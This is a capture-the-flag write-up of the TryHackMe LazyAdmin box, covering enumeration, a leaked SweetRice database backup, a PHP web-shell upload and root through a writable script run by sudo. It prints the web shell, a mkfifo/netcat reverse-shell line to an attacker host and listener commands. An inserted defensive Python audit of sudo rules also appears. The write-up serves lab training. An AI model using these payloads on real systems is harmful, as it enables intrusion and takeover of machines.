SweetRice CMS Exploitation | LazyAdmin TryHackMe
A TryHackMe machine featuring CMS enumeration, database extraction, remote shell upload, and privilege escalation.
LazyAdmin | Linux
Difficulty: Easy–Medium
Tags: CMS, SQL disclosure, file upload, privesc, sudo misconfig
Tools Used: Nmap, Gobuster, Searchsploit, CrackStation, Netcat, Python
A lazy sysadmin is a goldmine for an attacker. LazyAdmin is proof: find the breadcrumbs they left behind, and you’ll walk a straight line to root. This box is a surgical exercise in classic exploitation—misconfigured CMS, exposed backups, sloppy upload validation, and a laughable Perl-to-root escalation path. If you’re hunting for OSCP-ready muscle memory, this one will sharpen your instincts.
Initial Enumeration
First strike: full Nmap scan with scripts and versioning enabled.
nmap -sC -sV -oN init-scan 10.10.80.64
Results lit up:
22/tcp open ssh OpenSSH 7.2p2
80/tcp open http Apache 2.4.18
Port 80 gets the first look. Default Apache splash screen. Nothing useful on the surface—but that’s always where Gobuster earns its keep.
Web Enumeration
Time to rip through directories.
gobuster dir --url http://10.10.80.64 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Paydirt:
/content/
Behind that was SweetRice—a CMS that’s practically an exploit compendium if mismanaged. And this one was clearly neglected.
💡 SweetRice rarely gets patched. Even on real tests, smaller orgs leave it in weird corners of internal or staging servers. Always check for version leaks, and always hunt for backup paths—they’re infamous for it.
Credential Exposure via DB Backup
Pulled up Exploit-DB:
searchsploit sweetrice
Noticed version 1.5.1 had a backup disclosure bug. Checked the usual suspect:
http://10.10.80.64/content/inc/mysql_backup/
Jackpot: backup.sql sitting there in plain sight.
Downloaded and cracked open:
cat backup.sql | grep password
Found a hash:
42f749ade7f9e195bf475f37a44cafcb
Tossed it into CrackStation:
Password: password123
Lazy credentials for LazyAdmin. Let’s go.
Admin Panel Access and File Upload Exploit
Panel login page lived at:
http://10.10.80.64/content/as/
Logged in as manager with the cracked password.
CMS confirmed as SweetRice 1.5.1. Next step: find a weaponized exploit.
searchsploit sweetrice
Exploit 40700 stood out—file upload vulnerability in the Ads module. It allows uploading arbitrary files, including PHP.
Uploaded a reverse shell payload (PentestMonkey classic); stripped to its core, the uploaded file is nothing more than PHP that executes a command:
<?php system($_GET['cmd']); ?>
Listener armed:
nc -nlvp 31337
Then triggered:
http://10.10.80.64/content/attachment/reverse_shell.php
Shell acquired as www-data.
Privilege Escalation
Spawned a proper TTY:
python -c 'import pty; pty.spawn("/bin/bash")'
Checked sudo privileges:
sudo -l
The target practically begged to be pwned:
(ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl
Inspected the Perl script:
cat /home/itguy/backup.pl
Content:
#!/usr/bin/perl
system("sh", "/etc/copy.sh");
The real payload? /etc/copy.sh. Checked perms:
ls -l /etc/copy.sh
Writable. And that’s game.
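The defender's view of this exact chain, added here as an example and not part of the original writeup: the script stages the backup.pl plus /etc/copy.sh layout in a temp directory (constructed sample, not read from the box) and flags any file the sudo rule ends up running that a non-root user can write. The audit_rule() helper and its fake-root parameter are my own, not a real tool.

```python
# Added example: audit a sudo NOPASSWD rule that runs an interpreter on a script.
# Everything staged below is constructed to mirror LazyAdmin; audit_rule() and
# the fake-root parameter are assumptions, not a real CLI or library.
import os
import re
import stat
import tempfile

RULE_RE = re.compile(r'NOPASSWD:\s*(\S+)\s+(\S+)')  # interpreter, script
PATH_RE = re.compile(r'(/[\w./-]+)')                 # absolute paths in a script

def referenced_paths(script_text):
    """Absolute paths the script touches, ignoring its own shebang line."""
    body = [l for l in script_text.splitlines() if not l.startswith('#!')]
    return sorted(set(PATH_RE.findall('\n'.join(body))))

def world_writable(path):
    """True when 'others' hold the write bit, i.e. any local user can edit it."""
    return bool(os.stat(path).st_mode & stat.S_IWOTH)

def audit_rule(rule, root='/'):
    """Return (path, reason) findings; root lets the check run on a staged tree."""
    m = RULE_RE.search(rule)
    if not m:
        return []
    script = m.group(2)

    def on_disk(p):
        return os.path.join(root, p.lstrip('/'))

    findings = []
    if world_writable(on_disk(script)):
        findings.append((script, 'sudo target script is world-writable'))
    with open(on_disk(script)) as f:
        for p in referenced_paths(f.read()):
            if os.path.isfile(on_disk(p)) and world_writable(on_disk(p)):
                findings.append((p, 'file invoked by sudo script is world-writable'))
    return findings

def demo():
    """Stage the LazyAdmin layout in a temp dir (constructed) and audit it."""
    root = tempfile.mkdtemp()
    for d in ('home/itguy', 'etc'):
        os.makedirs(os.path.join(root, d))
    perl = os.path.join(root, 'home/itguy/backup.pl')
    with open(perl, 'w') as f:
        f.write('#!/usr/bin/perl\nsystem("sh", "/etc/copy.sh");\n')
    os.chmod(perl, 0o755)  # the Perl script itself is not writable
    copy_sh = os.path.join(root, 'etc/copy.sh')
    with open(copy_sh, 'w') as f:
        f.write('#!/bin/sh\necho backup\n')
    os.chmod(copy_sh, 0o777)  # the LazyAdmin misconfiguration
    return audit_rule('(ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl', root)
```

Run the same audit_rule() against each NOPASSWD line of sudo -l output on a real host to catch the pattern before an attacker does.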
Replaced it with a reverse shell:
echo 'rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc <attacker-ip> 5554 > /tmp/f' > /etc/copy.sh
New listener:
nc -nlvp 5554
Triggered the payload:
sudo /usr/bin/perl /home/itguy/backup.pl
Got root.
whoami
root
cat /root/root.txt
Summary / Review
This box wasn’t hard. It was neglected—and that’s deadlier. Let’s run it back:
Recon spotted port 80 and a stock Apache page.
Gobuster uncovered /content/, revealing a dusty SweetRice CMS.
Database backup leaked creds from a .sql file.
Login + upload let us drop a shell through the Ads module.
Sudo misconfig handed us root via a writable script and an unguarded Perl call.
It’s not just about vulnerabilities. It’s about bad habits—leaving backups in prod, reusing weak passwords, writing scripts with escalated perms pointing to writable locations. That’s how red teamers get in, fast and quiet.
Command Recap
nmap -sC -sV -oN init-scan 10.10.80.64
gobuster dir --url http://10.10.80.64 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
searchsploit sweetrice
curl http://10.10.80.64/content/inc/mysql_backup/backup.sql
Crack hash: CrackStation
Login to http://10.10.80.64/content/as/
Upload PHP shell via Ads module
nc -nlvp 31337
python -c 'import pty; pty.spawn("/bin/bash")'
sudo -l
echo 'reverse shell payload' > /etc/copy.sh
nc -nlvp 5554
sudo /usr/bin/perl /home/itguy/backup.pl
Final Thoughts
A stale CMS, exposed DB dump, and lazy privilege boundaries—this one practically hacked itself. Fast creds, clean shell, effortless root — just how I like it.